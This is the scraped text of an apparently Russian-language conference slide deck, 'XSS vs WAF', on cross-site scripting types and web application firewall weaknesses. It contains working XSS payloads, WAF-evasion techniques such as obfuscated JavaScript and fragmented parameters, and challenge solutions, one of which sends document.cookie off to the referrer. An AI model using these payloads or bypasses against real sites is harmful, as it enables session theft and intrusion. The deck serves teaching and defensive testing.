Embed Size (px)
Citation preview
![Page 1: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/1.jpg)
XSS vs WAF
Best practice
![Page 2: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/2.jpg)
• Межсайтовое выполнение сценариев
• Может быть использовано злоумышленником
для получения данных (cookie, DOM, etc),
проведения других атак (CSRF, SPAM).
• Классический пример:
<input type=text
value=“”><script>alert(document.cookie)</script>”>
XSS: Cross Site Scripting
* можно спать
![Page 3: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/3.jpg)
• Reflected (non-persistent) – отраженные. Ответ
сервера содержит данные из запроса.
• Stored (persistent) – хранимые. Ответ сервера
содержит данные, внедренные ранее.
• DOM based – динамические. Страница на
клиентской стороне динамически может быть
изменена данными запроса.
XSS: Международная классификация
* можно спать
![Page 4: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/4.jpg)
• Внедрение тэга:
<input type=text value=><script>alert(1337)</script>
• Внедрение атрибута:
<a href=„http://cmc.msu.su‟ onclick=alert(1337) a=„„>
• Внедрение в активное содержимое
(JavaScript,SWF,PDF):
if (text==„a‟ || alert(1337) || „‟) {
• Внедрение в заголовок HTTP ответа, другое:
Location: javascript:alert(1) - miXSS
XSS: Техническая классификация
* можно спать
![Page 5: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/5.jpg)
• Tyler Reguly, nCircle at 06.04.2010
miXSS: meta information XSS
* можно проснуться
![Page 6: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/6.jpg)
• Требующие действий пользователя:
<a href=„a‟ onmouseover=alert(1337) style=„font-
size:500px„>
• Автономные:
<input type=text value=a onfocus=alert(1337)
AUTOFOCUS>
XSS: Классификация по реализации
* можно спать
![Page 7: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/7.jpg)
• Twitter 21.09.2010:
http://twitter.com/nn#@"onmouseover="alert(1337);"/
• Youtube 04.07.2010:
XSS: latest examples
* можно просыпаться
![Page 8: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/8.jpg)
• Cross Application Scripting
• Множество GUI понимает HTML
From XSS to CAS: все новое – это..
* можно проснуться
http://www.backtrack-linux.org/backtrack/cross-application-
scripting-all-you-kde-are-belong-to-us/
![Page 9: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/9.jpg)
• SMS manager:
tel:/+7123213?call
• Safari:
<iframe src=“skype://+27836712?call”>
• Mail manager:
Пример закрыт до устранения уязвимости
iPhone/iPad CAS prototypes
* надо запомнить
![Page 10: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/10.jpg)
• Блокирует подозрительный запрос
• Исправляет подозрительный запрос
• Блокирует источник подозрительного запроса
• Подозрительный по сигнатурам
– подходит под рег. выражение, типа: «onmouse*».
• Подозрительный по правилам
– запрос без предыстории (сразу на страницу смены
пароля без посещения главной)
WAF: Web Application Firewall
* пора просыпаться
![Page 11: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/11.jpg)
• Простые сигнатуры часто ошибаются:
“ „ < > [ { } ] ( )
• Сложные сигнатуры всегда неполные из-за
разнообразия браузеров и проч.
onmouseover -> onmouseenter
• Данные надо нормализовать перед
сигнатурным анализом
e\xp\re\s\s\i\o\n(alert
(1337))
WAF: сложности в реализации
* подъем!
![Page 12: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/12.jpg)
• Есть функционал веб-приложения, где WAF
должен быть отключен (HTML редактор)
• Веб-приложение может быть уязвимо для
фрагментированных атак
http://localhost/t.php?a=<scri&a=pt>&a=alert(1)&a=<
/scri&a=pt>
• Надо встраивать интерпретатор JavaScript:
document[(![]+/./)[5]+(![]+/./)[1]+(![]+/./)[1]+String.from
CharCode(75,73)+(![]+/./)[4]]
WAF: сложности в реализации
* подъем!
![Page 13: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/13.jpg)
• Поиск не фильтруемых данных (_FILES,
URI …)
• Поиск ошибок в нормализации
(uni/*union*/on, \u000000028)
• Поиск не фильтруемых сигнатур
• Поиск ошибок логики (XSS threw white list)
• Остальные методы
HOWTO find WAF 0day ;)
* подъем!
![Page 14: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/14.jpg)
• Попробуйте проверить WAF на фильтрацию
JavaScript функции setInterval()
• setInterval – аналог setTimeout, введенный для
совместимости со старыми версиями JavaScript
• Эту функцию почему-то забывают добавлять в
сигнатуры, ограничиваясь только setTimeout
• Таких примеров очень-очень много, посмотрите
хотя бы список событий на http://msdn.microsoft.com/en-us/library/ms533051(VS.85).aspx
HOWTO find WAF 0day ;)
* подъем!
![Page 15: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/15.jpg)
• Opened XSS challenge at http://onsec.ru/t.php
• WAF фильтрует
„ , ", < , > , ( , ) , // в $_GET, $_POST, $_COOKIE, $_FILE
• Внедрения в код
• “<input type='text' name='text' value=„ ”.$_GET[„text‟]. “ „>”
• “<input type='text' name='search„
value=“.$_POST[„search‟].”>”
• “<h3 onmouseover=“.$_GET[„aaa‟].”>”
Проведем эксперимент
* подъем!
![Page 16: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/16.jpg)
• Opened XSS challenge at http://onsec.ru/t.php
• Решения от oRB [rdot.org]
/t.php?aaa=document.location.href=[document.referrer,docu
ment.cookie]
/t.php?aaa=document.location=[/javascript:1/.source,location
.pathname,location.hash]#/;alert(document.cookie);
• Решение от asddas [rdot.org]
/t.php?aaa=document.location.href=document.forms[0].text.v
alue&text=http:\\google.com
Проведем эксперимент
* подъем!
![Page 17: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/17.jpg)
• Opened XSS challenge at http://onsec.ru/t.php
• Решение от Влада Роскова [vos.uz]
/t.php?aaa=document.all[5][window.name]=location.hash#
<input style=width:100%;height:100%;
onmouseover="alert(document.cookie)">
• Самое элегантное решение от Ruben Ventura [thr3w]
/t.php?aaa=location.href=%26quot;javascript:alert\u0028/XS
S/.source\u0029%26quot;
Проведем эксперимент
* подъем!
![Page 18: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/18.jpg)
• WAF обнаруживает злоумышленника
• WAF закрывает какие-то вектора атаки
• WAF – хороший, сделайте его еще лучше!
WAF: так ли все плохо?
* можно снова спать
![Mass SQL Injection 탐지우회 기법 · WAF 우회 SQL Injection 성공] 2) XSS (Cross Site Script) 같은 방법으로 XSS (Cross Site Script)역시 가능하였다. XSS Cheat](https://img.pdfslide.tips/doc/110x75/5e7c232c2491d90d1b7e7ee5/mass-sql-injection-foe-ee-waf-oe-sql-injection-e-2-xss-cross.jpg)
![Page 19: [ONSEC ]XSS vs waf](https://reader035.pdfslide.tips/reader035/viewer/2022081803/557f664bd8b42af1298b4909/html5/thumbnails/19.jpg)
![Chaos Construcions 2010 SDRF presentation [ONSEC]](https://img.pdfslide.tips/doc/110x75/555e22a4d8b42a384f8b4bcb/chaos-construcions-2010-sdrf-presentation-onsec.jpg)
